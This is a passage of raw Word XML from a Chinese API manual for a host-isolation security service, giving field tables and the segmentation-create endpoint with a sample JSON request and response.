            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A84C2F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22374A48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1768F16C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="541B7D76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>comId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DA908B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18BFF6BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5EA1226A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30028A63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ipList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C83BCBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14ECE1DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>放行</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7409D154" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66B21B84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>portList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59D67D14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14895836" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>放行端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="642B1566" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37B068D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05B209F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A345199" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>协议，*表示</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>都支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7515441A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63E0DA72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="442932F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B93EDC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3A54F624" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BE299CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F3306CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="739871DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E716C39" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6873883C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="333E58BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79DF168F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务状态：1隔离中 2隔离成功 3隔离失败 4修改中 5修改失败 6解除中 7解除失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32B88CCC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6051C5B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C1AAC76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6657006F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">操作类型， </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>micro_segmentation_add</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">:新增， </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>micro_segmentation_edit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：修改 ，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>micro_segmentation_del</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0CA436DA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CFE4C38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72BEDF93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F940583" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>错误描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2D04AC3C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12D90EE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1CA4BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61E86F5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>隔离方向,in:入站，out：出站，all：全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="275039CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="425" w:name="_Toc115166285"/>
      <w:bookmarkStart w:id="426" w:name="创建隔离接口"/>
      <w:bookmarkEnd w:id="424"/>
      <w:r>
        <w:t>创建隔离接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="425"/>
    </w:p>
    <w:p w14:paraId="4BC5B281" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5DDA93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/segmentation/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D971FD3"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6"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3835"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="73875D4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9ACED8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A21CC21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DA0F7A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13490667" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EE574C5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B117D87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="590961B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57F64966" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E6AB66F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机Id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4BA66BC7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43BDAF77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F01327C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BFA991C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67D0ADBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>隔离方向,in:入站，out：出站，all：全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="185BCBCD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A8180A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ipList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6530FB21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="231EFBE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76B1A6E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>放行</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A5E7917" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14A624A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>portList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44D908D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5533EDDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44389950" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>放行端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52537D65" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="255837D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44629D00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="162DF2CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BC8683A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67FE5D23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2447F291" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark":"123456",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>direction":"out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":["192.168.1.100","172.16.2.187"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":["80","81","82"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773158E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2C608C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3080B167"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1656D59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4228E63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CBD613A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1847D22D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56B6F1E5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
